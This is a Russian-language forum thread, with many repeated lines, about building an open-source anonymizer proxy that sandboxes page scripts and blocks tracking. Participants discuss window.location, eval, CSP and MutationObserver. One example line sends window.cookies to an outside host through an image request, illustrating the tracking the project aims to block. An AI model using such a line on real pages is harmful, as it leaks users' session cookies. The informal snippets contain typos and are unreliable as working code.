> аномайзер
значение знаешь?
пока частично отлавливаю изменения dom в яваскрипте
есть есть проблема. как отловить, переопределить или запретить нахуй этот ебаный window.location?
есть есть проблема. как отловить, переопределить или запретить нахуй этот ебаный window.location?
Прямо так и пиши:
window.location = {
'href': 'http://2ch.hk/',
'protocol': 'http',
'hostname': '2ch.hk',
'port': '',
'pathname': '/',
'search': '',
'hash': '',
'assign':
'reload': function() {},
'assign': function() {},
'replace': function() {},
};
window.location = {
'href': 'http://2ch.hk/',
'protocol': 'http',
'hostname': '2ch.hk',
'port': '',
'pathname': '/',
'search': '',
'hash': '',
'assign':
'reload': function() {},
'assign': function() {},
'replace': function() {},
};
проблема, что location нельзя переопределить. она ридонли. делать автозамену в яваскриптах winodow.location на что-то свое тоже не очень надежно
Братюнь, не изобретай велосипед. Для полноценной анонимности уже давно изобрели Whonix, который есть набор из двух виртуалок с Тором, а твои начинания обречены, к сожалению, на провал, потому как если браузер знает реальный айпи, он его обязательно рано или поздно выдаст. Или бери сорцы какого-нибудь фаерфокса и хакай их.
ну с задачей обхода фильтров мой скрипт справится. от АНБ конечно не спасет. яваскрипт это такое дрявое решето оказывается.
вот сейчас обнаружил, что вконтакте шпиоонит запуская свои счетчики через
new Image().src и это говно похоже никак не перехватить
вот сейчас обнаружил, что вконтакте шпиоонит запуская свои счетчики через
new Image().src и это говно похоже никак не перехватить
просто хотел добится, чтоб всякие шпионские счетчики не лезли яваскриптов
в доке мозилы по секьюрети полиси, что-то упоминалось, что можно блочить ембедет контент ссылающийся на внешние домены, но конкретных примеров я не нашел
в доке мозилы по секьюрети полиси, что-то упоминалось, что можно блочить ембедет контент ссылающийся на внешние домены, но конкретных примеров я не нашел
Написал обертку для windows.Image ололо вконтакте со своими вставками шипоинского кода через Image.src теперь сосет
Так а как ты от eval уйдёшь?
Спасибо, не знал. Ну замыканием-то можно: оберни все содержимое <script> в (function(window, location){ })(customWindow, customLocation);
самая проблема ути не от eval, а перехватить изменения атрбутов, через такую записть document.getElementById("хуйпизда").src пока не знаю, как с этим бороться Mutation Observer срабатывает уже после того, как все произошло.
если делать автозамену яваскрита по регэкспу, то да, встает проблема eval
если заворачивать все скрипты в (function(window) {})(fake_window), то тоже пизда, все поломает. большинство скриптов писаны криворукими убенами
если делать автозамену яваскрита по регэкспу, то да, встает проблема eval
если заворачивать все скрипты в (function(window) {})(fake_window), то тоже пизда, все поломает. большинство скриптов писаны криворукими убенами
> все поломает
Что конкретно может сломаться, например? Тем более, у сейчас не 2000-е, есть современный JS с defineProperty.
быдлокодеры любят определять глобальные функции и переменные. а потом вызвать их хуй пойми где
сегодня проверю возможно ли достать локальные переменные и функция бегая по this
сегодня проверю возможно ли достать локальные переменные и функция бегая по this
>defineProperty
почитал. похоже этим я смогу отловить изменения при прямом обращении к src
> глобальные переменные
Блин. Ты прав, с несколькими <script> сломается, да. Из замыкания список переменных не добыть. Разве что подумать насчет with, но там столько проблем, что, наверное, даже не стоит.
Очевидно, что это невозможно. Тебе про евал выше сказали. Юзеру придется отключать жабаскрипт.
Установи прокси и не мучайся.
eval переопределить или отключить - совершенно не проблема. То же и с Function.
Оп. Репортинг.
проверил this. список глобальных переменных можно достать из него, список локальных нельзя. пичалька. а то так бы я устроил скриптам макабы манямирок в замыкании.
Есть правда ебанутая техника, которая заключается в парзинге яваскрипта, но она ненадежна. ебанутый язык короче. шел 21-ый век, а у них даже нет способ получить список локальных переменных.
обращение к внешним ссылкам заблочил, через CSP хидер. в принципе можно дальше не кочевряжится, но хотелось бы, что бы капча полноценно работала и можно было логинится во всякие вконтакты, если кому-то это надо
проверил this. список глобальных переменных можно достать из него, список локальных нельзя. пичалька. а то так бы я устроил скриптам макабы манямирок в замыкании.
Есть правда ебанутая техника, которая заключается в парзинге яваскрипта, но она ненадежна. ебанутый язык короче. шел 21-ый век, а у них даже нет способ получить список локальных переменных.
обращение к внешним ссылкам заблочил, через CSP хидер. в принципе можно дальше не кочевряжится, но хотелось бы, что бы капча полноценно работала и можно было логинится во всякие вконтакты, если кому-то это надо
самая проблема сейчас это windows.location вот с не, падлой, ничего не сделаешь кроме тупой замены ее вызова в коде.
-> /s/
тоже так думаю. хотя не пробовал еще
-> /s/
тоже так думаю. хотя не пробовал еще
Есть другая ебанутая техника. Есть несколько <script>. Читаем все сразу. Обертываем первый в функцию, возвращающую функцию со вторым, возвращающую функцию с третьим и т. д. Получившуюся портянку пишем в первый <script>, результат запоминаем в переменной, вызываем его в следующем <script> и т. д. Таким образом весь код будет в замыкании, ему можно скормить любой window, но при этом он будет видеть "глобальные" var и function. Там тоже есть проблемы, но их можно решить, я думаю.
не совсем понял что точно происходит, но вот что я думаю
делаем глобальный var scripts
все скрпиты по ссылкам и инлайн в html заворачиваем в функции или даже превращаем строку, которую потом будем запускать через eval внутри замыкания
т. е.
scripts.put("// eba scritp ololo I'm spying on you
(new Image()).src = \"http://fbi.gov/?blah=\" + window.cookies;);
потом в нашем скрипте делаем
(function(window) {
for (var s in scripts) {
eval(s);
}
}).apply(manya_mircue_window, manya_mircue_window);
какие подводные камни?
делаем глобальный var scripts
все скрпиты по ссылкам и инлайн в html заворачиваем в функции или даже превращаем строку, которую потом будем запускать через eval внутри замыкания
т. е.
scripts.put("// eba scritp ololo I'm spying on you
(new Image()).src = \"http://fbi.gov/?blah=\" + window.cookies;);
потом в нашем скрипте делаем
(function(window) {
for (var s in scripts) {
eval(s);
}
}).apply(manya_mircue_window, manya_mircue_window);
какие подводные камни?
даже так:
отправлять яваскрипт код на исполнение в манямирок через postMessage
отправлять яваскрипт код на исполнение в манямирок через postMessage
теперь дошло, что ты имел ввиду
решение со вложенными функциями даже изящней чем евал всего.
но евал все равно нужен, если какой-то уебок написал в html
<botton onclick="javascritp: functziya()"/>
это надо заменять на что-то типа
<botton onclick="javascritp: safe_eval("functziya()")"/>
решение со вложенными функциями даже изящней чем евал всего.
но евал все равно нужен, если какой-то уебок написал в html
<botton onclick="javascritp: functziya()"/>
это надо заменять на что-то типа
<botton onclick="javascritp: safe_eval("functziya()")"/>
бамп.
как перехвать изменения в innerHTML?
как перехвать изменения в innerHTML?
Мутэйшн ивентами разумеется. Через DOMNodeInserted/DOMNodeRemoved
т.к. изменение через innerHTML это именно не модификация, а вставление нового узла + удаление старого.
Вот:
http://jsfiddle.net/hyc8guoj/1/
Читай доку:
http://www.w3.org/TR/DOM-Level-3-Events/#event-type-DOMNodeRemoved
но они пишут, что эта хуйня деприкейтед
Ну да, зато работает на любом DOM. Если модный, то используй MutationObserver:
http://jsfiddle.net/hyc8guoj/3/
Дока:
https://developer.mozilla.org/en-US/docs/Web/API/MutationObserver
https://dom.spec.whatwg.org/#mutationobserver
нушотытам блять?
пилю потихоньку. сделал проброску куков с фильтраций
Красава, ъзакинь проектик на жидхаб мож кто присоединиться, мож я даже
Вот эта штука: https://addons.mozilla.org/ru/firefox/addon/ghostery/ обнаруживает всякие "жучки" в сайтах и по желанию блокирует их. В том числе и виджеты соцсетей. Своеобразный адблок. Не знаю как он работает, но твоя идея уже реализована.
БАМП
Сейчас пытаюсь заставить работать в нем двач со совоими аяксами-хуяксами, почти работает.
Вопрос: есть ли способ запретить внешние ресурсы на своей странице? Например заблочить полностью выполнение скриптов и показ картинок, если они не с сайт_нейм?
В чем проблема: Казалось бы все хорошо, делай замену в html как деды и все, но на современных сайтах куча всякого говна типа гугл аналитика, которое считают тебя, показывают красивые кнопочки фейсбук, показывают тебе рекламу и попутно следят за тобой. Причем это говно все динамическое и вставляется в DOM прямо из яваскрипт. т. е. простой заменой в html не отделаешься.
Может у анон есть еще какие идеи относительно аномайзера? Я бы мог реализовать. Проект будет опенсурс.